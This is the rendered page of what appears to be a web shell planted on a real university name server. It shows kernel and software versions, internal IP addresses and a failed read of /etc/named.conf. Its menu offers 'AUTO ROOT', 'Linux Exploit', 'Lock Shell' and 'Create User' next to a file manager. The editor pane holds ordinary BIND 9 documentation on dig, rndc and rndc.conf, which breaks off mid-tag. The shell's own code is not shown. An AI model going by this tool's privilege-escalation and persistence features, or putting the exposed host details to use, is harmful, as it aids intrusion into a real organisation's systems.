Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
bind9-doc /
arm /
[ HOME SHELL ]
Name
Size
Permission
Action
_static
[ DIR ]
drwxr-xr-x
chapter10.html
22.05
KB
-rw-r--r--
chapter1.html
34.51
KB
-rw-r--r--
chapter2.html
15.73
KB
-rw-r--r--
chapter3.html
131.95
KB
-rw-r--r--
chapter4.html
48.77
KB
-rw-r--r--
chapter5.html
81.82
KB
-rw-r--r--
chapter6.html
145.29
KB
-rw-r--r--
chapter7.html
52.45
KB
-rw-r--r--
chapter9.html
18.56
KB
-rw-r--r--
dnssec-guide.html
436.46
KB
-rw-r--r--
general.html
46.95
KB
-rw-r--r--
genindex.html
203.17
KB
-rw-r--r--
history.html
9.97
KB
-rw-r--r--
index.html
28.49
KB
-rw-r--r--
manpages.html
803.05
KB
-rw-r--r--
notes.html
238.02
KB
-rw-r--r--
reference.html
1.4
MB
-rw-r--r--
search.html
5.21
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : chapter4.html
<!DOCTYPE html> <html class="writer-html5" lang="en" > <head> <meta charset="utf-8" /><meta name="generator" content="Docutils 0.17.1: http://docutils.sourceforge.net/" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <title>4. Name Server Operations — BIND 9 9.18.39-0ubuntu0.22.04.2-Ubuntu documentation</title> <link rel="stylesheet" href="_static/pygments.css" type="text/css" /> <link rel="stylesheet" href="_static/css/theme.css" type="text/css" /> <link rel="stylesheet" href="_static/custom.css" type="text/css" /> <script data-url_root="./" id="documentation_options" src="_static/documentation_options.js"></script> <script src="_static/jquery.js"></script> <script src="_static/underscore.js"></script> <script src="_static/doctools.js"></script> <script src="_static/js/theme.js"></script> <link rel="index" title="Index" href="genindex.html" /> <link rel="search" title="Search" href="search.html" /> <link rel="next" title="5. DNSSEC" href="chapter5.html" /> <link rel="prev" title="3. Configurations and Zone Files" href="chapter3.html" /> </head> <body class="wy-body-for-nav"> <div class="wy-grid-for-nav"> <nav data-toggle="wy-nav-shift" class="wy-nav-side"> <div class="wy-side-scroll"> <div class="wy-side-nav-search" > <a href="index.html" class="icon icon-home"> BIND 9 </a> <div class="version"> 9.18.39-0ubuntu0.22.04.2-Ubuntu </div> <div role="search"> <form id="rtd-search-form" class="wy-form" action="search.html" method="get"> <input type="text" name="q" placeholder="Search docs" /> <input type="hidden" name="check_keywords" value="yes" /> <input type="hidden" name="area" value="default" /> </form> </div> </div><div class="wy-menu wy-menu-vertical" data-spy="affix" role="navigation" aria-label="Navigation menu"> <ul class="current"> <li class="toctree-l1"><a class="reference internal" href="chapter1.html">1. Introduction to DNS and BIND 9</a></li> <li class="toctree-l1"><a class="reference internal" href="chapter2.html">2. Resource Requirements</a></li> <li class="toctree-l1"><a class="reference internal" href="chapter3.html">3. Configurations and Zone Files</a></li> <li class="toctree-l1 current"><a class="current reference internal" href="#">4. Name Server Operations</a><ul> <li class="toctree-l2"><a class="reference internal" href="#tools-for-use-with-the-name-server-daemon">4.1. Tools for Use With the Name Server Daemon</a><ul> <li class="toctree-l3"><a class="reference internal" href="#diagnostic-tools">4.1.1. Diagnostic Tools</a></li> <li class="toctree-l3"><a class="reference internal" href="#administrative-tools">4.1.2. Administrative Tools</a></li> </ul> </li> <li class="toctree-l2"><a class="reference internal" href="#signals">4.2. Signals</a></li> <li class="toctree-l2"><a class="reference internal" href="#plugins">4.3. Plugins</a></li> <li class="toctree-l2"><a class="reference internal" href="#configuring-plugins">4.4. Configuring Plugins</a></li> <li class="toctree-l2"><a class="reference internal" href="#developing-plugins">4.5. Developing Plugins</a></li> </ul> </li> <li class="toctree-l1"><a class="reference internal" href="chapter5.html">5. DNSSEC</a></li> <li class="toctree-l1"><a class="reference internal" href="chapter6.html">6. Advanced Configurations</a></li> <li class="toctree-l1"><a class="reference internal" href="chapter7.html">7. Security Configurations</a></li> <li class="toctree-l1"><a class="reference internal" href="reference.html">8. Configuration Reference</a></li> <li class="toctree-l1"><a class="reference internal" href="chapter9.html">9. Troubleshooting</a></li> <li class="toctree-l1"><a class="reference internal" href="chapter10.html">10. Building BIND 9</a></li> </ul> <p class="caption" role="heading"><span class="caption-text">Appendices</span></p> <ul> <li class="toctree-l1"><a class="reference internal" href="notes.html">Release Notes</a></li> <li class="toctree-l1"><a class="reference internal" href="changelog.html">Changelog</a></li> <li class="toctree-l1"><a class="reference internal" href="dnssec-guide.html">DNSSEC Guide</a></li> <li class="toctree-l1"><a class="reference internal" href="history.html">A Brief History of the DNS and BIND</a></li> <li class="toctree-l1"><a class="reference internal" href="general.html">General DNS Reference Information</a></li> <li class="toctree-l1"><a class="reference internal" href="manpages.html">Manual Pages</a></li> </ul> </div> </div> </nav> <section data-toggle="wy-nav-shift" class="wy-nav-content-wrap"><nav class="wy-nav-top" aria-label="Mobile navigation menu" > <i data-toggle="wy-nav-top" class="fa fa-bars"></i> <a href="index.html">BIND 9</a> </nav> <div class="wy-nav-content"> <div class="rst-content"> <div role="navigation" aria-label="Page navigation"> <ul class="wy-breadcrumbs"> <li><a href="index.html" class="icon icon-home"></a> »</li> <li><span class="section-number">4. </span>Name Server Operations</li> <li class="wy-breadcrumbs-aside"> <a href="_sources/chapter4.rst.txt" rel="nofollow"> View page source</a> </li> </ul> <hr/> </div> <div role="main" class="document" itemscope="itemscope" itemtype="http://schema.org/Article"> <div itemprop="articleBody"> <section id="name-server-operations"> <span id="ns-operations"></span><h1><span class="section-number">4. </span>Name Server Operations<a class="headerlink" href="#name-server-operations" title="Permalink to this headline"></a></h1> <section id="tools-for-use-with-the-name-server-daemon"> <span id="tools"></span><h2><span class="section-number">4.1. </span>Tools for Use With the Name Server Daemon<a class="headerlink" href="#tools-for-use-with-the-name-server-daemon" title="Permalink to this headline"></a></h2> <p>This section describes several indispensable diagnostic, administrative, and monitoring tools available to the system administrator for controlling and debugging the name server daemon.</p> <section id="diagnostic-tools"> <span id="id1"></span><h3><span class="section-number">4.1.1. </span>Diagnostic Tools<a class="headerlink" href="#diagnostic-tools" title="Permalink to this headline"></a></h3> <p>The <a class="reference internal" href="manpages.html#std-iscman-dig"><code class="xref std std-iscman docutils literal notranslate"><span class="pre">dig</span></code></a>, <a class="reference internal" href="manpages.html#std-iscman-host"><code class="xref std std-iscman docutils literal notranslate"><span class="pre">host</span></code></a>, and <a class="reference internal" href="manpages.html#std-iscman-nslookup"><code class="xref std std-iscman docutils literal notranslate"><span class="pre">nslookup</span></code></a> programs are all command-line tools for manually querying name servers. They differ in style and output format.</p> <dl> <dt><a class="reference internal" href="manpages.html#std-iscman-dig"><code class="xref std std-iscman docutils literal notranslate"><span class="pre">dig</span></code></a></dt><dd><p><a class="reference internal" href="manpages.html#std-iscman-dig"><code class="xref std std-iscman docutils literal notranslate"><span class="pre">dig</span></code></a> is the most versatile and complete of these lookup tools. It has two modes: simple interactive mode for a single query, and batch mode, which executes a query for each in a list of several query lines. All query options are accessible from the command line.</p> <p>For more information and a list of available commands and options, see <a class="reference internal" href="manpages.html#man-dig"><span class="std std-ref">dig - DNS lookup utility</span></a>.</p> </dd> <dt><a class="reference internal" href="manpages.html#std-iscman-host"><code class="xref std std-iscman docutils literal notranslate"><span class="pre">host</span></code></a></dt><dd><p>The <a class="reference internal" href="manpages.html#std-iscman-host"><code class="xref std std-iscman docutils literal notranslate"><span class="pre">host</span></code></a> utility emphasizes simplicity and ease of use. By default, it converts between host names and Internet addresses, but its functionality can be extended with the use of options.</p> <p>For more information and a list of available commands and options, see <a class="reference internal" href="manpages.html#man-host"><span class="std std-ref">host - DNS lookup utility</span></a>.</p> </dd> <dt><a class="reference internal" href="manpages.html#std-iscman-nslookup"><code class="xref std std-iscman docutils literal notranslate"><span class="pre">nslookup</span></code></a></dt><dd><p><a class="reference internal" href="manpages.html#std-iscman-nslookup"><code class="xref std std-iscman docutils literal notranslate"><span class="pre">nslookup</span></code></a> has two modes: interactive and non-interactive. Interactive mode allows the user to query name servers for information about various hosts and domains, or to print a list of hosts in a domain. Non-interactive mode is used to print just the name and requested information for a host or domain.</p> <p>Due to its arcane user interface and frequently inconsistent behavior, we do not recommend the use of <a class="reference internal" href="manpages.html#std-iscman-nslookup"><code class="xref std std-iscman docutils literal notranslate"><span class="pre">nslookup</span></code></a>. Use <a class="reference internal" href="manpages.html#std-iscman-dig"><code class="xref std std-iscman docutils literal notranslate"><span class="pre">dig</span></code></a> instead.</p> </dd> </dl> </section> <section id="administrative-tools"> <span id="admin-tools"></span><h3><span class="section-number">4.1.2. </span>Administrative Tools<a class="headerlink" href="#administrative-tools" title="Permalink to this headline"></a></h3> <p>Administrative tools play an integral part in the management of a server.</p> <dl> <dt><a class="reference internal" href="manpages.html#std-iscman-named-checkconf"><code class="xref std std-iscman docutils literal notranslate"><span class="pre">named-checkconf</span></code></a></dt><dd><p>The <a class="reference internal" href="manpages.html#std-iscman-named-checkconf"><code class="xref std std-iscman docutils literal notranslate"><span class="pre">named-checkconf</span></code></a> program checks the syntax of a <a class="reference internal" href="manpages.html#std-iscman-named.conf"><code class="xref std std-iscman docutils literal notranslate"><span class="pre">named.conf</span></code></a> file.</p> <p>For more information and a list of available commands and options, see <a class="reference internal" href="manpages.html#man-named-checkconf"><span class="std std-ref">named-checkconf - named configuration file syntax checking tool</span></a>.</p> </dd> <dt><a class="reference internal" href="manpages.html#std-iscman-named-checkzone"><code class="xref std std-iscman docutils literal notranslate"><span class="pre">named-checkzone</span></code></a></dt><dd><p>The <a class="reference internal" href="manpages.html#std-iscman-named-checkzone"><code class="xref std std-iscman docutils literal notranslate"><span class="pre">named-checkzone</span></code></a> program checks a zone file for syntax and consistency.</p> <p>For more information and a list of available commands and options, see <a class="reference internal" href="manpages.html#man-named-checkzone"><span class="std std-ref">named-checkzone - zone file validation tool</span></a>.</p> </dd> <dt><a class="reference internal" href="manpages.html#std-iscman-named-compilezone"><code class="xref std std-iscman docutils literal notranslate"><span class="pre">named-compilezone</span></code></a></dt><dd><p>This tool is similar to <a class="reference internal" href="manpages.html#std-iscman-named-checkzone"><code class="xref std std-iscman docutils literal notranslate"><span class="pre">named-checkzone</span></code></a> but it always dumps the zone content to a specified file (typically in a different format).</p> <p>For more information and a list of available commands and options, see <a class="reference internal" href="manpages.html#man-named-compilezone"><span class="std std-ref">named-compilezone - zone file converting tool</span></a>.</p> </dd> </dl> <dl id="ops-rndc"> <dt><a class="reference internal" href="manpages.html#std-iscman-rndc"><code class="xref std std-iscman docutils literal notranslate"><span class="pre">rndc</span></code></a></dt><dd><p>The remote name daemon control (<a class="reference internal" href="manpages.html#std-iscman-rndc"><code class="xref std std-iscman docutils literal notranslate"><span class="pre">rndc</span></code></a>) program allows the system administrator to control the operation of a name server.</p> <p>See <a class="reference internal" href="manpages.html#man-rndc"><span class="std std-ref">rndc - name server control utility</span></a> for details of the available <a class="reference internal" href="manpages.html#std-iscman-rndc"><code class="xref std std-iscman docutils literal notranslate"><span class="pre">rndc</span></code></a> commands.</p> <p><a class="reference internal" href="manpages.html#std-iscman-rndc"><code class="xref std std-iscman docutils literal notranslate"><span class="pre">rndc</span></code></a> requires a configuration file, since all communication with the server is authenticated with digital signatures that rely on a shared secret, and there is no way to provide that secret other than with a configuration file. The default location for the <a class="reference internal" href="manpages.html#std-iscman-rndc"><code class="xref std std-iscman docutils literal notranslate"><span class="pre">rndc</span></code></a> configuration file is <code class="docutils literal notranslate"><span class="pre">/etc/bind/rndc.conf</span></code>, but an alternate location can be specified with the <a class="reference internal" href="manpages.html#cmdoption-rndc-c"><code class="xref std std-option docutils literal notranslate"><span class="pre">-c</span></code></a> option. If the configuration file is not found, <a class="reference internal" href="manpages.html#std-iscman-rndc"><code class="xref std std-iscman docutils literal notranslate"><span class="pre">rndc</span></code></a> also looks in <code class="docutils literal notranslate"><span class="pre">/etc/bind/rndc.key</span></code> (or whatever <code class="docutils literal notranslate"><span class="pre">sysconfdir</span></code> was defined when the BIND build was configured). The <code class="docutils literal notranslate"><span class="pre">rndc.key</span></code> file is generated by running <a class="reference internal" href="manpages.html#cmdoption-rndc-confgen-a"><code class="xref std std-option docutils literal notranslate"><span class="pre">rndc-confgen</span> <span class="pre">-a</span></code></a> as described in <a class="reference internal" href="reference.html#namedconf-statement-controls" title="namedconf-statement-controls"><code class="xref any namedconf namedconf-ref docutils literal notranslate"><span class="pre">controls</span></code></a>.</p> <p>The format of the configuration file is similar to that of <a class="reference internal" href="manpages.html#std-iscman-named.conf"><code class="xref std std-iscman docutils literal notranslate"><span class="pre">named.conf</span></code></a>, but is limited to only three blocks: the <a class="reference internal" href="#rndcconf-statement-options" title="rndcconf-statement-options"><code class="xref rndcconf rndcconf-ref docutils literal notranslate"><span class="pre">options</span></code></a>, <a class="reference internal" href="#rndcconf-statement-key" title="rndcconf-statement-key"><code class="xref rndcconf rndcconf-ref docutils literal notranslate"><span class="pre">key</span></code></a>, <a class="reference internal" href="#rndcconf-statement-server" title="rndcconf-statement-server"><code class="xref rndcconf rndcconf-ref docutils literal notranslate"><span class="pre">server</span></code></a>, and the <a class="reference internal" href="reference.html#include-grammar"><span class="std std-ref">include Directive</span></a>. These blocks are what associate the secret keys to the servers with which they are meant to be shared. The order of blocks is not significant.</p> </dd> </dl> <dl class="rndcconf statement"> <dt class="sig sig-object rndcconf" id="rndcconf-statement-options"> <span class="sig-name descname"><span class="pre">options</span></span><a class="headerlink" href="#rndcconf-statement-options" title="Permalink to this definition"></a></dt> <dd><p><strong>Grammar: </strong><div class="highlight-default notranslate"><div class="highlight"><pre><span></span><span class="n">options</span> <span class="p">{</span> <span class="n">default</span><span class="o">-</span><span class="n">key</span> <span class="o"><</span><span class="n">string</span><span class="o">></span><span class="p">;</span> <span class="n">default</span><span class="o">-</span><span class="n">port</span> <span class="o"><</span><span class="n">integer</span><span class="o">></span><span class="p">;</span> <span class="n">default</span><span class="o">-</span><span class="n">server</span> <span class="o"><</span><span class="n">string</span><span class="o">></span><span class="p">;</span> <span class="n">default</span><span class="o">-</span><span class="n">source</span><span class="o">-</span><span class="n">address</span> <span class="p">(</span> <span class="o"><</span><span class="n">ipv4_address</span><span class="o">></span> <span class="o">|</span> <span class="o">*</span> <span class="p">);</span> <span class="n">default</span><span class="o">-</span><span class="n">source</span><span class="o">-</span><span class="n">address</span><span class="o">-</span><span class="n">v6</span> <span class="p">(</span> <span class="o"><</span><span class="n">ipv6_address</span><span class="o">></span> <span class="o">|</span> <span class="o">*</span> <span class="p">);</span> <span class="p">};</span> </pre></div> </div> </p> <p><strong>Blocks: </strong>topmost</p> <dl class="rndcconf statement"> <dt class="sig sig-object rndcconf" id="rndcconf-statement-default-server"> <span class="sig-name descname"><span class="pre">default-server</span></span><a class="headerlink" href="#rndcconf-statement-default-server" title="Permalink to this definition"></a></dt> <dd><p><strong>Grammar: </strong><code class="docutils literal notranslate"><span class="pre">default-server</span> <span class="pre"><string>;</span></code></p> <p><strong>Blocks: </strong>options</p> <p><a class="reference internal" href="#rndcconf-statement-default-server" title="rndcconf-statement-default-server"><code class="xref any rndcconf rndcconf-ref docutils literal notranslate"><span class="pre">default-server</span></code></a> takes a host name or address argument and represents the server that is contacted if no <a class="reference internal" href="manpages.html#cmdoption-rndc-s"><code class="xref std std-option docutils literal notranslate"><span class="pre">-s</span></code></a> option is provided on the command line.</p> </dd></dl> <dl class="rndcconf statement"> <dt class="sig sig-object rndcconf" id="rndcconf-statement-default-key"> <span class="sig-name descname"><span class="pre">default-key</span></span><a class="headerlink" href="#rndcconf-statement-default-key" title="Permalink to this definition"></a></dt> <dd><p><strong>Grammar: </strong><code class="docutils literal notranslate"><span class="pre">default-key</span> <span class="pre"><string>;</span></code></p> <p><strong>Blocks: </strong>options</p> <p><a class="reference internal" href="#rndcconf-statement-default-key" title="rndcconf-statement-default-key"><code class="xref any rndcconf rndcconf-ref docutils literal notranslate"><span class="pre">default-key</span></code></a> takes the name of a key as its argument, as defined by a <a class="reference internal" href="#rndcconf-statement-key" title="rndcconf-statement-key"><code class="xref rndcconf rndcconf-ref docutils literal notranslate"><span class="pre">key</span></code></a> block.</p> </dd></dl> <dl class="rndcconf statement"> <dt class="sig sig-object rndcconf" id="rndcconf-statement-default-port"> <span class="sig-name descname"><span class="pre">default-port</span></span><a class="headerlink" href="#rndcconf-statement-default-port" title="Permalink to this definition"></a></dt> <dd><p><strong>Grammar: </strong><code class="docutils literal notranslate"><span class="pre">default-port</span> <span class="pre"><integer>;</span></code></p> <p><strong>Blocks: </strong>options</p> <p><a class="reference internal" href="#rndcconf-statement-default-port" title="rndcconf-statement-default-port"><code class="xref any rndcconf rndcconf-ref docutils literal notranslate"><span class="pre">default-port</span></code></a> specifies the port to which <a class="reference internal" href="manpages.html#std-iscman-rndc"><code class="xref std std-iscman docutils literal notranslate"><span class="pre">rndc</span></code></a> should connect if no port is given on the command line or in a <a class="reference internal" href="#rndcconf-statement-server" title="rndcconf-statement-server"><code class="xref rndcconf rndcconf-ref docutils literal notranslate"><span class="pre">server</span></code></a> block.</p> </dd></dl> <dl class="rndcconf statement"> <dt class="sig sig-object rndcconf" id="rndcconf-statement-default-source-address"> <span class="sig-name descname"><span class="pre">default-source-address</span></span><a class="headerlink" href="#rndcconf-statement-default-source-address" title="Permalink to this definition"></a></dt> <dd><p><strong>Grammar: </strong><code class="docutils literal notranslate"><span class="pre">default-source-address</span> <span class="pre">(</span> <span class="pre"><ipv4_address></span> <span class="pre">|</span> <span class="pre">*</span> <span class="pre">);</span></code></p> <p><strong>Blocks: </strong>options</p> </dd></dl> <dl class="rndcconf statement"> <dt class="sig sig-object rndcconf" id="rndcconf-statement-default-source-address-v6"> <span class="sig-name descname"><span class="pre">default-source-address-v6</span></span><a class="headerlink" href="#rndcconf-statement-default-source-address-v6" title="Permalink to this definition"></a></dt> <dd><p><strong>Grammar: </strong><code class="docutils literal notranslate"><span class="pre">default-source-address-v6</span> <span class="pre">(</span> <span class="pre"><ipv6_address></span> <span class="pre">|</span> <span class="pre">*</span> <span class="pre">);</span></code></p> <p><strong>Blocks: </strong>options</p> <p><a class="reference internal" href="#rndcconf-statement-default-source-address" title="rndcconf-statement-default-source-address"><code class="xref any rndcconf rndcconf-ref docutils literal notranslate"><span class="pre">default-source-address</span></code></a> and <a class="reference internal" href="#rndcconf-statement-default-source-address-v6" title="rndcconf-statement-default-source-address-v6"><code class="xref any rndcconf rndcconf-ref docutils literal notranslate"><span class="pre">default-source-address-v6</span></code></a> specify the IPv4 and IPv6 source address used to communicate with the server if no address is given on the command line or in a <a class="reference internal" href="#rndcconf-statement-server" title="rndcconf-statement-server"><code class="xref rndcconf rndcconf-ref docutils literal notranslate"><span class="pre">server</span></code></a> block.</p> </dd></dl> </dd></dl> <dl class="rndcconf statement"> <dt class="sig sig-object rndcconf" id="rndcconf-statement-key"> <span class="sig-name descname"><span class="pre">key</span></span><a class="headerlink" href="#rndcconf-statement-key" title="Permalink to this definition"></a></dt> <dd><p><strong>Grammar server: </strong><code class="docutils literal notranslate"><span class="pre">key</span> <span class="pre"><string>;</span></code></p> <p><strong>Grammar topmost: </strong><div class="highlight-default notranslate"><div class="highlight"><pre><span></span><span class="n">key</span> <span class="o"><</span><span class="n">string</span><span class="o">></span> <span class="p">{</span> <span class="n">algorithm</span> <span class="o"><</span><span class="n">string</span><span class="o">></span><span class="p">;</span> <span class="n">secret</span> <span class="o"><</span><span class="n">string</span><span class="o">></span><span class="p">;</span> <span class="p">};</span> <span class="o">//</span> <span class="n">may</span> <span class="n">occur</span> <span class="n">multiple</span> <span class="n">times</span> </pre></div> </div> </p> <p><strong>Blocks: </strong>topmost, server</p> <p>The <a class="reference internal" href="#rndcconf-statement-key" title="rndcconf-statement-key"><code class="xref rndcconf rndcconf-ref docutils literal notranslate"><span class="pre">key</span></code></a> block defines a key to be used by <a class="reference internal" href="manpages.html#std-iscman-rndc"><code class="xref std std-iscman docutils literal notranslate"><span class="pre">rndc</span></code></a> when authenticating with <a class="reference internal" href="manpages.html#std-iscman-named"><code class="xref std std-iscman docutils literal notranslate"><span class="pre">named</span></code></a>. Its syntax is identical to the <a class="reference internal" href="reference.html#namedconf-statement-key" title="namedconf-statement-key"><code class="xref namedconf namedconf-ref docutils literal notranslate"><span class="pre">key</span></code></a> statement in <a class="reference internal" href="manpages.html#std-iscman-named.conf"><code class="xref std std-iscman docutils literal notranslate"><span class="pre">named.conf</span></code></a>. The keyword <a class="reference internal" href="#rndcconf-statement-key" title="rndcconf-statement-key"><code class="xref rndcconf rndcconf-ref docutils literal notranslate"><span class="pre">key</span></code></a> is followed by a key name, which must be a valid domain name, though it need not actually be hierarchical; thus, a string like <code class="docutils literal notranslate"><span class="pre">rndc_key</span></code> is a valid name. The <a class="reference internal" href="#rndcconf-statement-key" title="rndcconf-statement-key"><code class="xref rndcconf rndcconf-ref docutils literal notranslate"><span class="pre">key</span></code></a> block has two statements: <a class="reference internal" href="#rndcconf-statement-algorithm" title="rndcconf-statement-algorithm"><code class="xref rndcconf rndcconf-ref docutils literal notranslate"><span class="pre">algorithm</span></code></a> and <a class="reference internal" href="#rndcconf-statement-secret" title="rndcconf-statement-secret"><code class="xref rndcconf rndcconf-ref docutils literal notranslate"><span class="pre">secret</span></code></a>.</p> <dl class="rndcconf statement"> <dt class="sig sig-object rndcconf" id="rndcconf-statement-algorithm"> <span class="sig-name descname"><span class="pre">algorithm</span></span><a class="headerlink" href="#rndcconf-statement-algorithm" title="Permalink to this definition"></a></dt> <dd><p><strong>Grammar: </strong><code class="docutils literal notranslate"><span class="pre">algorithm</span> <span class="pre"><string>;</span></code></p> <p><strong>Blocks: </strong>key</p> <p>While the configuration parser accepts any string as the argument to <a class="reference internal" href="#rndcconf-statement-algorithm" title="rndcconf-statement-algorithm"><code class="xref rndcconf rndcconf-ref docutils literal notranslate"><span class="pre">algorithm</span></code></a>, currently only the strings <code class="docutils literal notranslate"><span class="pre">hmac-md5</span></code>, <code class="docutils literal notranslate"><span class="pre">hmac-sha1</span></code>, <code class="docutils literal notranslate"><span class="pre">hmac-sha224</span></code>, <code class="docutils literal notranslate"><span class="pre">hmac-sha256</span></code>, <code class="docutils literal notranslate"><span class="pre">hmac-sha384</span></code>, and <code class="docutils literal notranslate"><span class="pre">hmac-sha512</span></code> have any meaning.</p> </dd></dl> <dl class="rndcconf statement"> <dt class="sig sig-object rndcconf" id="rndcconf-statement-secret"> <span class="sig-name descname"><span class="pre">secret</span></span><a class="headerlink" href="#rndcconf-statement-secret" title="Permalink to this definition"></a></dt> <dd><p><strong>Grammar: </strong><code class="docutils literal notranslate"><span class="pre">secret</span> <span class="pre"><string>;</span></code></p> <p><strong>Blocks: </strong>key</p> <p>The secret is a Base64-encoded string as specified in <span class="target" id="index-0"></span><a class="rfc reference external" href="https://tools.ietf.org/html/rfc3548.html"><strong>RFC 3548</strong></a>.</p> </dd></dl> </dd></dl> <dl class="rndcconf statement"> <dt class="sig sig-object rndcconf" id="rndcconf-statement-server"> <span class="sig-name descname"><span class="pre">server</span></span><a class="headerlink" href="#rndcconf-statement-server" title="Permalink to this definition"></a></dt> <dd><p><strong>Grammar: </strong><div class="highlight-default notranslate"><div class="highlight"><pre><span></span><span class="n">server</span> <span class="o"><</span><span class="n">string</span><span class="o">></span> <span class="p">{</span> <span class="n">addresses</span> <span class="p">{</span> <span class="p">(</span> <span class="o"><</span><span class="n">quoted_string</span><span class="o">></span> <span class="p">[</span> <span class="n">port</span> <span class="o"><</span><span class="n">integer</span><span class="o">></span> <span class="p">]</span> <span class="o">|</span> <span class="o"><</span><span class="n">ipv4_address</span><span class="o">></span> <span class="p">[</span> <span class="n">port</span> <span class="o"><</span><span class="n">integer</span><span class="o">></span> <span class="p">]</span> <span class="o">|</span> <span class="o"><</span><span class="n">ipv6_address</span><span class="o">></span> <span class="p">[</span> <span class="n">port</span> <span class="o"><</span><span class="n">integer</span><span class="o">></span> <span class="p">]</span> <span class="p">);</span> <span class="o">...</span> <span class="p">};</span> <span class="n">key</span> <span class="o"><</span><span class="n">string</span><span class="o">></span><span class="p">;</span> <span class="n">port</span> <span class="o"><</span><span class="n">integer</span><span class="o">></span><span class="p">;</span> <span class="n">source</span><span class="o">-</span><span class="n">address</span> <span class="p">(</span> <span class="o"><</span><span class="n">ipv4_address</span><span class="o">></span> <span class="o">|</span> <span class="o">*</span> <span class="p">);</span> <span class="n">source</span><span class="o">-</span><span class="n">address</span><span class="o">-</span><span class="n">v6</span> <span class="p">(</span> <span class="o"><</span><span class="n">ipv6_address</span><span class="o">></span> <span class="o">|</span> <span class="o">*</span> <span class="p">);</span> <span class="p">};</span> <span class="o">//</span> <span class="n">may</span> <span class="n">occur</span> <span class="n">multiple</span> <span class="n">times</span> </pre></div> </div> </p> <p><strong>Blocks: </strong>topmost</p> <p>The <a class="reference internal" href="#rndcconf-statement-server" title="rndcconf-statement-server"><code class="xref rndcconf rndcconf-ref docutils literal notranslate"><span class="pre">server</span></code></a> block specifies connection parameters for a given server. The server can be specified as a host name or address.</p> <dl class="rndcconf statement"> <dt class="sig sig-object rndcconf" id="rndcconf-statement-addresses"> <span class="sig-name descname"><span class="pre">addresses</span></span><a class="headerlink" href="#rndcconf-statement-addresses" title="Permalink to this definition"></a></dt> <dd><p><strong>Grammar: </strong><code class="docutils literal notranslate"><span class="pre">addresses</span> <span class="pre">{</span> <span class="pre">(</span> <span class="pre"><quoted_string></span> <span class="pre">[</span> <span class="pre">port</span> <span class="pre"><integer></span> <span class="pre">]</span> <span class="pre">|</span> <span class="pre"><ipv4_address></span> <span class="pre">[</span> <span class="pre">port</span> <span class="pre"><integer></span> <span class="pre">]</span> <span class="pre">|</span> <span class="pre"><ipv6_address></span> <span class="pre">[</span> <span class="pre">port</span> <span class="pre"><integer></span> <span class="pre">]</span> <span class="pre">);</span> <span class="pre">...</span> <span class="pre">};</span></code></p> <p><strong>Blocks: </strong>server</p> <p>Specifies one or more addresses to use when communicating with this server.</p> </dd></dl> <dl class="simple"> <dt><a class="reference internal" href="#rndcconf-statement-key" title="rndcconf-statement-key"><code class="xref rndcconf rndcconf-ref docutils literal notranslate"><span class="pre">key</span></code></a></dt><dd><p>Associates a key defined using the <a class="reference internal" href="#rndcconf-statement-key" title="rndcconf-statement-key"><code class="xref rndcconf rndcconf-ref docutils literal notranslate"><span class="pre">key</span></code></a> statement with a server.</p> </dd> </dl> <dl class="rndcconf statement"> <dt class="sig sig-object rndcconf" id="rndcconf-statement-port"> <span class="sig-name descname"><span class="pre">port</span></span><a class="headerlink" href="#rndcconf-statement-port" title="Permalink to this definition"></a></dt> <dd><p><strong>Grammar: </strong><code class="docutils literal notranslate"><span class="pre">port</span> <span class="pre"><integer>;</span></code></p> <p><strong>Blocks: </strong>server</p> <p>Specifes the port <a class="reference internal" href="manpages.html#std-iscman-rndc"><code class="xref std std-iscman docutils literal notranslate"><span class="pre">rndc</span></code></a> should connect to on the server.</p> </dd></dl> <dl class="rndcconf statement"> <dt class="sig sig-object rndcconf" id="rndcconf-statement-source-address"> <span class="sig-name descname"><span class="pre">source-address</span></span><a class="headerlink" href="#rndcconf-statement-source-address" title="Permalink to this definition"></a></dt> <dd><p><strong>Grammar: </strong><code class="docutils literal notranslate"><span class="pre">source-address</span> <span class="pre">(</span> <span class="pre"><ipv4_address></span> <span class="pre">|</span> <span class="pre">*</span> <span class="pre">);</span></code></p> <p><strong>Blocks: </strong>server</p> </dd></dl> <dl class="rndcconf statement"> <dt class="sig sig-object rndcconf" id="rndcconf-statement-source-address-v6"> <span class="sig-name descname"><span class="pre">source-address-v6</span></span><a class="headerlink" href="#rndcconf-statement-source-address-v6" title="Permalink to this definition"></a></dt> <dd><p><strong>Grammar: </strong><code class="docutils literal notranslate"><span class="pre">source-address-v6</span> <span class="pre">(</span> <span class="pre"><ipv6_address></span> <span class="pre">|</span> <span class="pre">*</span> <span class="pre">);</span></code></p> <p><strong>Blocks: </strong>server</p> <p>Overrides <a class="reference internal" href="#rndcconf-statement-default-source-address" title="rndcconf-statement-default-source-address"><code class="xref rndcconf rndcconf-ref docutils literal notranslate"><span class="pre">default-source-address</span></code></a> and <a class="reference internal" href="#rndcconf-statement-default-source-address-v6" title="rndcconf-statement-default-source-address-v6"><code class="xref rndcconf rndcconf-ref docutils literal notranslate"><span class="pre">default-source-address-v6</span></code></a> for this specific server.</p> </dd></dl> <p>A sample minimal configuration file is as follows:</p> <div class="highlight-default notranslate"><div class="highlight"><pre><span></span><span class="n">key</span> <span class="n">rndc_key</span> <span class="p">{</span> <span class="n">algorithm</span> <span class="s2">"hmac-sha256"</span><span class="p">;</span> <span class="n">secret</span> <span class="s2">"c3Ryb25nIGVub3VnaCBmb3IgYSBtYW4gYnV0IG1hZGUgZm9yIGEgd29tYW4K"</span><span class="p">;</span> <span class="p">};</span> <span class="n">options</span> <span class="p">{</span> <span class="n">default</span><span class="o">-</span><span class="n">server</span> <span class="mf">127.0.0.1</span><span class="p">;</span> <span class="n">default</span><span class="o">-</span><span class="n">key</span> <span class="n">rndc_key</span><span class="p">;</span> <span class="p">};</span> </pre></div> </div> <p>This file, if installed as <code class="docutils literal notranslate"><span class="pre">/etc/bind/rndc.conf</span></code>, allows the command:</p> <p><a class="reference internal" href="manpages.html#cmdoption-rndc-arg-reload"><code class="xref 